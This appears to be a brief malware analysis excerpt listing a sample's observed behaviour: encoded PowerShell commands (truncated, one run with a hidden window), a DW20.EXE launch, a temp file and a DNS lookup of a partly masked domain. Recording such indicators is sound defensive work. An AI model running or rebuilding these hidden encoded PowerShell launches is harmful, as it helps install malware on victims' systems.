Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANQAwADAAXwA0ADEAPQAnAFkAXwAwADAAXwBfAF8AJwA7ACQAcQA4ADAAMAAyADIAIAA9ACAAJwA1ADgANQAnADsAJABpADkANwAzADgAMwBfAD0AJwB6ADcAOAA0ADgANgA2ACcAOwAkAGwANABfADQANwAwADMAOQA9ACQAZQBuAHYAOgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\978079.cvr
- DNS ASK mx###thyon.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANQAwADAAXwA0ADEAPQAnAFkAXwAwADAAXwBfAF8AJwA7ACQAcQA4ADAAMAAyADIAIAA9ACAAJwA1ADgANQAnADsAJABpADkANwAzADgAMwBfAD0AJwB6ADcAOAA0ADgANgA2ACcAOwAkAGwANABfADQANwAwADMAOQA9ACQAZQBuAHYAOgB...' (with hidden window)